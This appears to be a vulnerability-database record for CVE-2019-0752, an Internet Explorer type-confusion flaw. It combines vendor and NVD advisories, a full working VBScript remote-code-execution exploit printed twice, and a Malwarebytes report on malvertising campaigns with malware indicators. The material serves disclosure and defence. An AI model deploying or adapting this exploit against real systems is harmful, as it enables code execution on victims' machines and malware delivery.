ID MS:CVE-2019-0752 Type mscve Reporter Microsoft Modified 2019-04-10T07:00:00
Description
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.
The security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.
{"id": "MS:CVE-2019-0752", "bulletinFamily": "microsoft", "title": "Scripting Engine Memory Corruption Vulnerability", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "published": "2019-04-10T07:00:00", "modified": "2019-04-10T07:00:00", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0752", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2019-0752"], "type": "mscve", "lastseen": "2020-08-07T11:45:27", "edition": 2, "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-0752"]}, {"type": "symantec", "idList": ["SMNTC-107709"]}, {"type": "zdi", "idList": ["ZDI-19-359"]}, {"type": "exploitdb", "idList": ["EDB-ID:46928"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:81EBDB0FC17CF31113F0A5563BE1B678"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:540187E5ECB7F36C1103F84B204E1428"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153078"]}, {"type": "nessus", "idList": ["SMB_NT_MS19_APR_INTERNET_EXPLORER.NASL", "SMB_NT_MS19_APR_4493474.NASL", "SMB_NT_MS19_APR_4493446.NASL", "SMB_NT_MS19_APR_4493470.NASL", "SMB_NT_MS19_APR_4493509.NASL", "SMB_NT_MS19_APR_4493475.NASL", "SMB_NT_MS19_APR_4493451.NASL", "SMB_NT_MS19_APR_4493472.NASL"]}, {"type": "kaspersky", "idList": ["KLA11462"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815036", "OPENVAS:1361412562310815020", "OPENVAS:1361412562310815033", "OPENVAS:1361412562310815024", "OPENVAS:1361412562310815023", "OPENVAS:1361412562310815019", "OPENVAS:1361412562310815021", "OPENVAS:1361412562310815034", "OPENVAS:1361412562310815022"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C41259322CA5338694B85978B0EA6FA5"]}], "modified": "2020-08-07T11:45:27", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2020-08-07T11:45:27", "rev": 2}, "vulnersScore": 8.0}, "kbList": ["KB4493474", "KB4489886", "KB4493464", "KB4489882", "KB4489871", "KB4493475", "KB4493472", "KB4489868", "KB4493441", "KB4489881", "KB4489878", "KB4493509", "KB4489891", "KB4493451", "KB4489899", "KB4493446", "KB4493470", "KB4489872"], "msrc": "", "mscve": "CVE-2019-0752", "msAffectedSoftware": [{"kb": "KB4493441", "kbSupersedence": "KB4489886", "msplatform": "Windows 10 Version 1709 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4493464", "kbSupersedence": "KB4489868", "msplatform": "Windows 10 Version 1803 for 32-bit Systems", "name": "Internet Explorer 11"}, {"kb": "KB4493441", "kbSupersedence": "KB4489886", "msplatform": "Windows 10 Version 1709 for ARM64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4493441", "kbSupersedence": "KB4489886", "msplatform": "Windows 10 Version 1709 for 32-bit Systems", "name": "Internet Explorer 11"}, {"kb": "KB4493509", "kbSupersedence": "KB4489899", "msplatform": "Windows Server 2019", "name": "Internet Explorer 11"}, {"kb": "KB4493475", "kbSupersedence": "KB4489872", "msplatform": "Windows 10 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4493446", "kbSupersedence": "KB4489881", "msplatform": "Windows 8.1 for 32-bit systems", "name": "Internet Explorer 11"}, {"kb": "KB4493451", "kbSupersedence": "KB4489891", "msplatform": "Windows Server 2012", "name": "Internet Explorer 10"}, {"kb": "KB4493472", "kbSupersedence": "KB4489878", "msplatform": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "name": "Internet Explorer 11"}, {"kb": "KB4493446", "kbSupersedence": "KB4489881", "msplatform": "Windows 8.1 for x64-based systems", "name": "Internet Explorer 11"}, {"kb": "KB4493509", "kbSupersedence": "KB4489899", "msplatform": "Windows 10 Version 1809 for ARM64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4493464", "kbSupersedence": "KB4489868", "msplatform": "Windows 10 Version 1803 for ARM64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4493472", "kbSupersedence": "KB4489878", "msplatform": "Windows 7 for 32-bit Systems Service Pack 1", "name": "Internet Explorer 11"}, {"kb": "KB4493470", "kbSupersedence": "KB4489882", "msplatform": "Windows Server 2016", "name": "Internet Explorer 11"}, {"kb": "KB4493474", "kbSupersedence": "KB4489871", "msplatform": "Windows 10 Version 1703 for 32-bit Systems", "name": "Internet Explorer 11"}, {"kb": "KB4493470", "kbSupersedence": "KB4489882", "msplatform": "Windows 10 Version 1607 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4493475", "kbSupersedence": "KB4489872", "msplatform": "Windows 10 for 32-bit Systems", "name": "Internet Explorer 11"}, {"kb": "KB4493446", "kbSupersedence": "KB4489881", "msplatform": "Windows RT 8.1", "name": "Internet Explorer 11"}, {"kb": "KB4493509", "kbSupersedence": "KB4489899", "msplatform": "Windows 10 Version 1809 for 32-bit Systems", "name": "Internet Explorer 11"}, {"kb": "KB4493472", "kbSupersedence": "KB4489878", "msplatform": "Windows 7 for x64-based Systems Service Pack 1", "name": "Internet Explorer 11"}, {"kb": "KB4493464", "kbSupersedence": "KB4489868", "msplatform": "Windows 10 Version 1803 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4493446", "kbSupersedence": "KB4489881", "msplatform": "Windows Server 2012 R2", "name": "Internet Explorer 11"}, {"kb": "KB4493509", "kbSupersedence": "KB4489899", "msplatform": "Windows 10 Version 1809 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4493474", "kbSupersedence": "KB4489871", "msplatform": "Windows 10 Version 1703 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4493470", "kbSupersedence": "KB4489882", "msplatform": "Windows 10 Version 1607 for 32-bit Systems", "name": "Internet Explorer 11"}], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T13:38:36", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0739, CVE-2019-0753, CVE-2019-0862.", "edition": 4, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-09T21:29:00", "title": "CVE-2019-0752", "type": "cve", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0752"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:11"], "id": "CVE-2019-0752", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-0752", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:-:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2019-04-10T00:54:36", "bulletinFamily": "software", "cvelist": ["CVE-2019-0752"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions. Internet Explorer 10 and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-04-09T00:00:00", "published": "2019-04-09T00:00:00", "id": "SMNTC-107709", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/107709", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2019-0752 Remote Memory Corruption Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdi": [{"lastseen": "2020-06-22T11:40:12", "bulletinFamily": "info", "cvelist": ["CVE-2019-0752"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of script commands that set certain properties of DOM objects. By performing actions in script, an attacker can trigger a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process.", "edition": 1, "modified": "2019-06-22T00:00:00", "published": "2019-04-15T00:00:00", "id": "ZDI-19-359", "href": "https://www.zerodayinitiative.com/advisories/ZDI-19-359/", "title": "Microsoft Internet Explorer Property Put Type Confusion Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2019-05-24T14:21:11", "description": "", "published": "2019-05-24T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0752"], "modified": "2019-05-24T00:00:00", "id": "EDB-ID:46928", "href": "https://www.exploit-db.com/exploits/46928", "sourceData": "<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752 -->\r\n<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) -->\r\n<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->\r\n\r\n<!-- Tgroupcrew@gmail.com -->\r\n\r\n<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get -->\r\n<!-- all the way to RCE using no shellcode. -->\r\n\r\n<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10. -->\r\n<!-- (h/t: James Forshaw, Google Project Zero) -->\r\n\r\n<html>\r\n<meta http-equiv=\"x-ua-compatible\" content=\"IE=8\">\r\n<meta http-equiv=\"Expires\" content=\"-1\">\r\n<body>\r\n\t<div id=\"container1\" style=\"overflow:scroll; width: 10px\">\r\n\t\t<div id=\"content1\" style=\"width:5000000px\">\r\n\t\t\tContent\r\n\t\t</div>\r\n\t</div>\r\n<script language=\"VBScript.Encode\">\r\nDim ar1(&h3000000)\r\nDim ar2(1000)\r\nDim gremlin\r\naddressOfGremlin = &h28281000\r\nClass MyClass\r\n\tPrivate mValue\r\n\tPublic Property Let Value(v)\r\n\t\tmValue = v\r\n\tEnd Property\r\n\tPublic Default Property Get P\r\n\t\tP = mValue\t\t\t\t' Where to write\r\n\tEnd Property\r\nEnd Class\r\nSub TriggerWrite(where, val)\r\n\tDim v1\r\n\tSet v1 = document.getElementById(\"container1\")\r\n\tv1.scrollLeft = val\t\t' Write this value (Maximum: 0x001767dd)\r\n\tDim c\r\n\tSet c = new MyClass\r\n\tc.Value = where\r\n\tSet v1.scrollLeft = c\r\nEnd Sub\r\n' Our vulnerability does not immediately give us an unrestricted\r\n' write (though we could manufacture one). For our purposes, the\r\n' following is sufficient. It writes an arbitrary DWORD to an\r\n' arbitrary location, and sets the subsequent 3 bytes to zero.\r\nSub WriteInt32With3ByteZeroTrailer(addr, val)\r\n\tTriggerWrite addr , (val) AND &hff\r\n\tTriggerWrite addr + 1, (val\\&h100) AND &hff\r\n\tTriggerWrite addr + 2, (val\\&h10000) AND &hff\r\n\tTriggerWrite addr + 3, (val\\&h1000000) AND &hff\r\nEnd Sub\r\nSub WriteAsciiStringWith4ByteZeroTrailer(addr, str)\r\n\tFor i = 0 To Len(str) - 1\r\n\t\tTriggerWrite addr + i, Asc(Mid(str, i + 1, 1))\r\n\tNext\r\nEnd Sub\r\nFunction ReadInt32(addr)\r\n\tWriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr\r\n\tReadInt32 = ar1(gremlin)\r\nEnd Function\r\nFunction LeakAddressOfObject(obj)\r\n\tSet ar1(gremlin + 1) = obj\r\n\tLeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)\r\nEnd Function\r\nSub Exploit()\r\n\t' Corrupt vt of one array element (the \"gremlin\")\r\n\tTriggerWrite addressOfGremlin, &h4003\t' VT_BYREF | VT_I4\r\n\tFor i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100\r\n\t\tIf Not IsEmpty(ar1(i)) Then\r\n\t\t\tgremlin = i\r\n\t\t\tExit For\r\n\t\tEnd If\r\n\tNext\r\n\t\r\n\tIf IsEmpty(gremlin) Then\r\n\t\tMsgBox \"Could not find gremlin\"\r\n\t\tExit Sub\r\n\tEnd If\r\n\t\r\n\tFor i = 0 To UBound(ar2)\r\n\t\tSet ar2(i) = CreateObject(\"Scripting.Dictionary\")\r\n\tNext\r\n\t\r\n\tSet dict = ar2(UBound(ar2) / 2)\r\n\taddressOfDict = LeakAddressOfObject(dict)\r\n\tvtableOfDict = ReadInt32(addressOfDict)\r\n\tscrrun = vtableOfDict - &h11fc\r\n\tkernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90\r\n\twinExec = kernel32 + &h5d380\r\n\t\r\n\tdict.Exists \"dummy\"\t\t' Make a dispatch call, just to populate pld\r\n\t' Relocate pld to ensure its address doesn't contain a null byte\r\n\tpld = ReadInt32(addressOfDict + &h3c)\r\n\tfakePld = &h28281020\r\n\tFor i = 0 To 3 - 1\r\n\t\tWriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)\r\n\tNext\r\n\t\r\n\tfakeVtable = &h28282828\t\t' ASCII \"((((\"\r\n\tFor i = 0 To 21\r\n\t\tIf i = 12 Then\t\t' Dictionary.Exists\r\n\t\t\tfptr = winExec\r\n\t\tElse\r\n\t\t\tfptr = ReadInt32(vtableOfDict + 4 * i)\r\n\t\tEnd If\r\n\t\tWriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr\r\n\tNext\r\n\t\r\n\tWriteAsciiStringWith4ByteZeroTrailer addressOfDict, \"((((\\..\\PowerShell.ewe -Command \"\"<#AAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n\tWriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld\r\n\tWriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, \"#>$a = \"\"\"\"Start-Process cmd `\"\"\"\"\"\"/t:4f /k whoami /user`\"\"\"\"\"\"\"\"\"\"\"\" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))\"\"\"\r\n\t\r\n\tOn Error Resume Next\r\n\tdict.Exists \"dummy\"\t\t' Wheeee!!\r\n\t\r\n\t' A little cleanup to help prevent crashes after the exploit\r\n\tFor i = 1 To 3\r\n\t\tWriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict\r\n\t\tWriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2\r\n\tNext\r\n\tErase Dict\r\n\tErase ar2\r\nEnd Sub\r\nExploit\r\n</script>\r\n</body>\r\n</html>", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/46928"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption", "edition": 1, "published": "2019-05-24T00:00:00", "title": "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0752", "CVE-2019-0768"], "modified": "2019-05-24T00:00:00", "id": "EXPLOITPACK:540187E5ECB7F36C1103F84B204E1428", "href": "", "sourceData": "<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752 -->\n<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) -->\n<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->\n\n<!-- Tgroupcrew@gmail.com -->\n\n<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get -->\n<!-- all the way to RCE using no shellcode. -->\n\n<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10. -->\n<!-- (h/t: James Forshaw, Google Project Zero) -->\n\n<html>\n<meta http-equiv=\"x-ua-compatible\" content=\"IE=8\">\n<meta http-equiv=\"Expires\" content=\"-1\">\n<body>\n\t<div id=\"container1\" style=\"overflow:scroll; width: 10px\">\n\t\t<div id=\"content1\" style=\"width:5000000px\">\n\t\t\tContent\n\t\t</div>\n\t</div>\n<script language=\"VBScript.Encode\">\nDim ar1(&h3000000)\nDim ar2(1000)\nDim gremlin\naddressOfGremlin = &h28281000\nClass MyClass\n\tPrivate mValue\n\tPublic Property Let Value(v)\n\t\tmValue = v\n\tEnd Property\n\tPublic Default Property Get P\n\t\tP = mValue\t\t\t\t' Where to write\n\tEnd Property\nEnd Class\nSub TriggerWrite(where, val)\n\tDim v1\n\tSet v1 = document.getElementById(\"container1\")\n\tv1.scrollLeft = val\t\t' Write this value (Maximum: 0x001767dd)\n\tDim c\n\tSet c = new MyClass\n\tc.Value = where\n\tSet v1.scrollLeft = c\nEnd Sub\n' Our vulnerability does not immediately give us an unrestricted\n' write (though we could manufacture one). For our purposes, the\n' following is sufficient. It writes an arbitrary DWORD to an\n' arbitrary location, and sets the subsequent 3 bytes to zero.\nSub WriteInt32With3ByteZeroTrailer(addr, val)\n\tTriggerWrite addr , (val) AND &hff\n\tTriggerWrite addr + 1, (val\\&h100) AND &hff\n\tTriggerWrite addr + 2, (val\\&h10000) AND &hff\n\tTriggerWrite addr + 3, (val\\&h1000000) AND &hff\nEnd Sub\nSub WriteAsciiStringWith4ByteZeroTrailer(addr, str)\n\tFor i = 0 To Len(str) - 1\n\t\tTriggerWrite addr + i, Asc(Mid(str, i + 1, 1))\n\tNext\nEnd Sub\nFunction ReadInt32(addr)\n\tWriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr\n\tReadInt32 = ar1(gremlin)\nEnd Function\nFunction LeakAddressOfObject(obj)\n\tSet ar1(gremlin + 1) = obj\n\tLeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)\nEnd Function\nSub Exploit()\n\t' Corrupt vt of one array element (the \"gremlin\")\n\tTriggerWrite addressOfGremlin, &h4003\t' VT_BYREF | VT_I4\n\tFor i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100\n\t\tIf Not IsEmpty(ar1(i)) Then\n\t\t\tgremlin = i\n\t\t\tExit For\n\t\tEnd If\n\tNext\n\t\n\tIf IsEmpty(gremlin) Then\n\t\tMsgBox \"Could not find gremlin\"\n\t\tExit Sub\n\tEnd If\n\t\n\tFor i = 0 To UBound(ar2)\n\t\tSet ar2(i) = CreateObject(\"Scripting.Dictionary\")\n\tNext\n\t\n\tSet dict = ar2(UBound(ar2) / 2)\n\taddressOfDict = LeakAddressOfObject(dict)\n\tvtableOfDict = ReadInt32(addressOfDict)\n\tscrrun = vtableOfDict - &h11fc\n\tkernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90\n\twinExec = kernel32 + &h5d380\n\t\n\tdict.Exists \"dummy\"\t\t' Make a dispatch call, just to populate pld\n\t' Relocate pld to ensure its address doesn't contain a null byte\n\tpld = ReadInt32(addressOfDict + &h3c)\n\tfakePld = &h28281020\n\tFor i = 0 To 3 - 1\n\t\tWriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)\n\tNext\n\t\n\tfakeVtable = &h28282828\t\t' ASCII \"((((\"\n\tFor i = 0 To 21\n\t\tIf i = 12 Then\t\t' Dictionary.Exists\n\t\t\tfptr = winExec\n\t\tElse\n\t\t\tfptr = ReadInt32(vtableOfDict + 4 * i)\n\t\tEnd If\n\t\tWriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr\n\tNext\n\t\n\tWriteAsciiStringWith4ByteZeroTrailer addressOfDict, \"((((\\..\\PowerShell.ewe -Command \"\"<#AAAAAAAAAAAAAAAAAAAAAAAAA\"\n\tWriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld\n\tWriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, \"#>$a = \"\"\"\"Start-Process cmd `\"\"\"\"\"\"/t:4f /k whoami /user`\"\"\"\"\"\"\"\"\"\"\"\" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))\"\"\"\n\t\n\tOn Error Resume Next\n\tdict.Exists \"dummy\"\t\t' Wheeee!!\n\t\n\t' A little cleanup to help prevent crashes after the exploit\n\tFor i = 1 To 3\n\t\tWriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict\n\t\tWriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2\n\tNext\n\tErase Dict\n\tErase ar2\nEnd Sub\nExploit\n</script>\n</body>\n</html>", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2020-09-10T19:41:16", "bulletinFamily": "blog", "cvelist": ["CVE-2018-15982", "CVE-2019-0752"], "description": "Malvertising campaigns leading to exploit kits are nowhere near as common these days. Indeed, a number of threat actors have moved on to other delivery methods instead of relying on drive-by downloads.\n\nHowever, occasionally we see spikes in activity that are noticeable enough that they highlight a successful run. In late August, we started seeing a Fallout exploit kit campaign distributing the Raccoon Stealer via high-traffic adult sites. Shortly after we reported it to the ad network, the same threat actor came back again using the RIG exploit kit instead. \n\nThen we saw possibly the largest campaign to date on top site xhamster[.]com from a malvertiser we have tracked for well over a year. This threat actor has managed to abuse practically all adult ad networks but this may be the first time they hit a top publisher.\n\n### Malvertising on popular ad network \n\nThe first malicious advertiser we observed was able to bid for ads on a number of adult sites by targeting users running Internet Explorer without any particular geolocation restriction, although the majority of victims were in the US.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/09/statscountry.png> \"\" )Figure 1: Victims by country on the left, adult sites traffic on the right\n\nIn this campaign, the crooks abused the popular ad network ExoClick by using different redirection pages. However, each time we were able to notify the ad network and get them shut down quickly.\n\nThe first domain they used was inteca-deco[.]com, which was setup as a web design agency but visibly a decoy page to the trained eye.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/09/webdesign.png> \"\" )Figure 2: Decoy page used as a gate to exploit kit\n\nSimple server-side cloaking performs the redirect to a Fallout exploit kit landing page which attempts to exploit [CVE-2019-0752](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0752>) (Internet Explorer) and [CVE-2018-15982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15982>) (Flash Player) before dropping the Raccoon Stealer.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/09/Fallout.png> \"\" )Figure 3: Traffic for Fallout exploit kit\n\nAbout 10 days later, another domain, websolvent[.]me, became active but used a different redirection technique, a 302 redirect, also known as 302 cushioning. This time we see the RIG exploit kit which also delivers Raccoon Stealer.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/09/RIG.png> \"\" )Figure 4: Traffic for RIG exploit kit\n\nBeyond a common payload, those two domains are also related. A [RiskIQ crawl](<https://community.riskiq.com/search/intica-deco.com/hostpairs>) confirms a relationship between these 2 domains where the parent host was caught doing a meta refresh redirect to the child:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/09/hostpairs.png> \"\" )Figure 5: Passive Total's host pairs \n\n### Malvertising on top adult site gets maximum reach\n\nThe second malvertiser ('malsmoke') is one that we have tracked diligently over the past several months and whose end payload is often the Smoke Loader malware. It is by far the most daring and successful one in that it goes after larger publishers and a variety of ad networks. However, up until now we had only seen them on publishers from the adult industry that are still relatively small in scale.\n\nIn this instance, the threat actor was able to abuse the Traffic Stars ad network and place their malicious ad on xhamster[.]com, a site with just over 1.06 billion monthly visits according to [SimilarWeb.com](<https://www.similarweb.com/website/xhamster.com/#overview>).\n\nThe gates used by this group also use a decoy site and over time they have registered domains mocking ad networks and cloud providers.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/09/popunder.png> \"\" )Figure 6: Malicious Popunder on xhamster (brought to the forefront)\n\nThe redirection mechanism is more sophisticated than those used in other malvertising campaigns. There is some client-side fingerprinting and connectivity checks to avoid VPNs and proxies, only targeting legitimate IP addresses.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/09/malvertising_xhamster.png> \"\" )Figure 7: Traffic for xhamster malvertising\n\nInterestingly, this Smoke Loader instance also downloads Raccoon Stealer and ZLoader.\n\nMalsmoke is probably the most persistent malvertising campaigns we have seen this year. Unlike other threat actors, this group has shown that it can rapidly switch ad networks to keep their business uninterrupted.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/09/malsmoke_.png> \"\" )Figure 8: Malvertising campaigns related to malsmoke\n\n### Still using Internet Explorer?\n\nThreat actors still leveraging exploit kits to deliver malware is one thing, but end users browsing with Internet Explorer is another. Despite recommendations from Microsoft and security professionals, we can only witness that there are still a number of users (consumer and enterprise) worldwide that have yet to migrate to a modern and fully supported browser.\n\nAs a result, exploit kit authors are squeezing the last bit of juice from vulnerabilities in Internet Explorer and Flash Player (due to retire for good next year).\n\nMalwarebytes customers have long been protected from malvertising and exploit kits. We continue to track and report the campaigns we run into to help do our part in keeping the Internet safer.\n\n### Indicators of compromise\n\n**Gates used in malvertising campaign pushing Raccoon Stealer**\n\nintica-deco[.]com \nwebsolvent[.]me\n\n**Raccoon Stealer**\n\nb289155154642ba8e9b032490a20c4a2c09b925e5b85dda11fc85d377baa6a6c \nf319264b36cdf0daeb6174a43aaf4a6684775e6f0fb69aaf2d7dc051a593de93\n\n**Raccoon Stealer C2s**\n\n34.105.147[.]92/gate/log.php \nchinadevmonster[.]top/gate/log.php\n\n**Smoke Loader**\n\n23bef893e3af7cb49dc5ae0a14452ed781f841db7397dc3ebb689291fd701b6b\n\n**Smoke Loader C2s**\n\ndkajsdjiqwdwnfj[.]info \n2831ujedkdajsdj[.]info \n928eijdksasnfss[.]info \ndkajsdjiqwdwnfj[.]info \n2831ujedkdajsdj[.]info \n928eijdksasnfss[.]info\n\n******Gates used in the malsmoke campaign**\n\neinlegesohle[.]com/indexx.php \nadexhangetomatto[.]space \nencelava[.]com/coexo.php \nencelava[.]com/caac \nuneaskie[.]com/ukexo.php \nbumblizz[.]com/auexo.php \nbumblizz[.]com/auflexexo.php \nbumblizz[.]com/caexo.php \nbumblizz[.]com/caflexexo.php \nbumblizz[.]com/usexo.php \nbumblizz[.]com/usflexexo.php 